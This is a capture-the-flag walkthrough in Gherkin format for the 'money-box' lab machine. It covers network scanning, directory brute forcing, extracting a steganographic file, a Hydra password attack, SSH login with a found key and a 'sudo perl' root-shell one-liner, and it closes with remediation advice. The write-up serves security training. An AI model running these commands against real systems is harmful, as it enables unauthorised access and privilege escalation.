## Version 1.4.1
## language: en

Feature:
  TOE:
    money-box
  Category:
    Inappropriate Source Code Style or Formatting
  Location:
    http://192.168.5.4:80/S3cr3t-T3xt
  CWE:
    CWE-1085: Invokable Control Element with Excessive
    Volume of Commented-out Code
  Rule:
    REQ.171: https://fluidattacks.com/products/rules/list/171
  Goal:
    Get three flags
  Recommendation:
    It’d better avoid writing comments in the webpage source code and
    uploading sensitive information in the FTP server if that doesn't have a
    secure authentication mechanism

  Background:
  Hacker's software:
    | <Software name>            | <Version>|
    | Kali Linux                 | 2020.4   |
    | Mozilla Firefox            | 78.3.0   |
    | Burp Suit Community Edition| 2021.2.1 |
    | Gobuster                   | 3.0.1    |
    | Nmap                       | 7.91     |
    | stegcracker                | 2.1.0    |
    | Hydra                      | 9.1      |

  TOE information:
    Given a .OVA file
    When I saw its extension
    Then I executed it on virtualbox
    Then I saw that the machine was running debian in its version 10
    And it was requesting a user as it's shown in [evidence](01.png)
    Then I verified which IP was assigned to me by dhcp server with the command
    """
    ip add show eth0
    """
    And I got the next result
    """
    eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc
    pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:ab:08:1c brd ff:ff:ff:ff:ff:ff
    inet 192.168.5.2/29 brd 192.168.5.7 scope global dynamic noprefixroute eth0
    valid_lft 354sec preferred_lft 354sec
    inet6 fe80::a00:27ff:feab:81c/64 scope link noprefixroute
    valid_lft forever preferred_lft forever
    """
    And I scanned the network using nmap with the next command
    """
    nmap -sP 192.168.5.0/29
    """
    And I got the next result
    """
    Nmap scan report for 192.168.5.2
    Host is up (0.00063s latency).
    Nmap scan report for 192.168.5.4
    Host is up (0.00052s latency).
    Nmap done: 8 IP addresses (2 hosts up) scanned in 1.30 seconds
    """
    Then I knew that 192.168.5.4 was the target machine's IP address
    And I used nmap again to know which ports were opened with the command
    """
    nmap -A 192.168.5.4
    """
    And I got the next result
    """
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     vsftpd 3.0.3
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    |_-rw-r--r--    1 0        0         1093656 Feb 26 09:48 trytofind.jpg
    | ftp-syst:
    |   STAT:
    | FTP server status:
    |      Connected to ::ffff:192.168.5.2
    |      Logged in as ftp
    |      TYPE: ASCII
    |      No session bandwidth limit
    |      Session timeout in seconds is 300
    |      Control connection is plain text
    |      Data connections will be plain text
    |      At session startup, client count was 2
    |      vsFTPd 3.0.3 - secure, fast, stable
    |_End of status
    22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey:
    |   2048 1e:30:ce:72:81:e0:a2:3d:5c:28:88:8b:12:ac:fa:ac (RSA)
    |   256 01:9d:fa:fb:f2:06:37:c0:12:fc:01:8b:24:8f:53:ae (ECDSA)
    |_  256 2f:34:b3:d0:74:b4:7f:8d:17:d2:37:b1:2e:32:f7:eb (ED25519)
    80/tcp open  http    Apache httpd 2.4.38 ((Debian))
    |_http-server-header: Apache/2.4.38 (Debian)
    |_http-title: MoneyBox
    Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    """
    Then I noted that port 21 was used by FTP in its version 3.0.3
    And anonymous login was allowed
    And SSH was executing on port 22 on its version 2.0
    And HTTP was using on port 80 with apache 2.4.38

  Scenario: Normal use case
    Given HTTP and FTP services were working on ports 80 and 21 respectively
    Then I accessed to them using browser
    And thus I could see the main webpage [evidence](02.png)
    And The FTP server's content [evidence](03.png)

  Scenario: Static detection
    Given I didn't have access to the source code
    Then I couldn't do this detection

  Scenario: Dynamic detection
    Given I didn't found out any wrong
    When I was analyzing the web server
    Then I decided to search possible hidden directories with gobuster
    Then I executed the below command
    """
    gobuster dir -u 192.168.5.4 -w /usr/share/SecLists/Discovery/Web-Content/
    raft-large-words.txt -x php,html,txt -s 200,204,301,302,307,401
    """
    And thus I got the next output
    """
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://192.168.5.4
    [+] Threads:        10
    [+] Wordlist:       /usr/share/SecLists/Discovery/Web-Content
    /raft-large-words.txt
    [+] Status codes:   200,204,301,302,307,401
    [+] User Agent:     gobuster/3.0.1
    [+] Extensions:     html,txt,php
    [+] Timeout:        10s
    ===============================================================
    2021/03/15 09:32:02 Starting gobuster
    ===============================================================
    /index.html (Status: 200)
    /. (Status: 200)
    /blogs (Status: 301)
    ===============================================================
    2021/03/15 09:33:00 Finished
    ===============================================================
    """
    Then I checked the blogs directory
    And I saw an interesting message as it's shown in [evidence](04.png)
    Then I analyzed the web page using burp suit
    And thus I found another hidden directory [evidence](05.png)
    Then I accessed to that directory
    And I looked the following webpage [evidence](06.png)
    Then I analyzed that webpage with burp suit one more time
    And there I found a password [evidence](07.png)
    Then I tried logging me through SSH with that password as root user
    And it didn't work
    Then I accessed to the FTP server
    And I downloaded the file which was available
    Then I tried finding a hidden or embedded file using stegcracker
    And I used the password previously found
    """
    stegcracker trytofind.jpg list1
    StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker)
    Copyright (c) 2021 - Luke Paris (Paradoxis)
    StegCracker has been retired following the release of StegSeek, which
    will blast through the rockyou.txt wordlist within 1.9 second as opposed
    to StegCracker which takes ~5 hours.
    StegSeek can be found at: https://github.com/RickdeJager/stegseek
    Counting lines in wordlist..
    Attacking file 'trytofind.jpg' with wordlist 'list1'..
    Successfully cracked file with password: 3xtr4ctd4t4
    Tried 1 passwords
    Your file has been written to: trytofind.jpg.out
    3xtr4ctd4t4
    """
    Then I opened the resulting file
    And there I found the message below
    """
    Hello.....  renu
    I tell you something Important.Your Password is too Week So Change Your
    Password
    Don't Underestimate it.......
    """
    Then I did a brute force attack using Hydra to find the renu password
    And thus I could find the renu password as it can see in [evidence](08.png)

  Scenario: Exploitation
    Given previously I'd found out the password for renu user
    Then I logged me through SSH with that password [evidence](09.png)
    Then I checked the user's privileges but renu couldn't run the sudo command
    Then I inspected files in the renu home directory
    And thus I found my first flag as it's shown in [evidence](10.png)
    Then I listed the home directory
    And thus I noted that there was another user known as lily
    Then I accessed to that directory
    And there I found out the second flag as it can see in [evidence](11.png)
    Then I tried searching something more to get the root privileges
    And I didn't find any in that directory
    Then I got back to the renu directory
    And I visualized the .bash_history file
    """
    cler
    ls
    ls -la
    cd /home
    ls
    clear
    cd
    ls
    ls -la
    exit
    clear
    ls
    ls -la
    cd /home
    ls
    cd lily
    ls
    ls -la
    clear
    cd
    clear
    ssh-keygen -t rsa
    clear
    cd .ssh
    ls
    ssh-copy-id lily@192.168.43.80
    clear
    cd
    cd -
    ls -l
    chmod 400 id_rsa
    ls -l
    ssh -i id_rsa lily@192.168.43.80
    clear
    ssh -i id_rsa lily@192.168.43.80
    cd
    clear
    cd .ssh/
    ls
    ssh -i id_rsa lily@192.168.43.80
    su lily
    clear
    cd
    sudo apt install openssh
    sudo apt update
    sudo apt install openssh-server
    sudo service ssh start
    sudo service ssh status
    clear
    cd /etc/
    ls
    cd ssh
    ls
    nano ssh_config
    ls
    nano sshd_config
    clear
    cd
    ls
    ls -la
    chsh bash
    chsh
    clear
    su root
    clear
    sudo apt install openssh
    su root
    exit
    """
    When I analyzed its content
    Then I noted that I could login as lily with the renu's private key
    And for that I executed the following command
    """
    ssh -i id_rsa lily@192.168.5.4
    """
    Then I executed the command below
    """
    sudo --list
    """
    And thus I noted that lily could executed perl as root
    """
    Matching Defaults entries for lily on MoneyBox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\
    :/usr/sbin\:/usr/bin\:/sbin\:/bin
    User lily may run the following commands on MoneyBox:
    (ALL : ALL) NOPASSWD: /usr/bin/perl
    """
    Then I executed the next command to get root privileges
    """
    sudo perl -e 'exec "/bin/bash";'
    """
    Then I accessed to the root directory
    And I listed the file in that directory but I didn't see anything
    Then I listed the hidden files
    And Thus I found the third flag and solve the challenge [evidence](12.png)

  Scenario: Remediation
    Given some relevant information about the system it can find in the webpage
    And the source code on the webpage has comments which reveal some hints
    And key to access to another user is in the same system
    And the passwords are weak
    Then it'd better removing comments from source code before uploading it
    And avoid storing the keys from other users in the same system
    And establish good password policies to have strong passwords

  Scenario: Scoring
   Base: Attributes that are constants over time and organizations
     7.6/10 (High) - AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H/
   Temporal: Attributes that measure the exploit's popularity and fixability
     7.6/10 (High) - E:H/RL:O/RC:C/
   Environmental: Unique and relevant attributes to a specific user environment
     7.5/10 (High) - CR:L/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found until date 2021-03-15
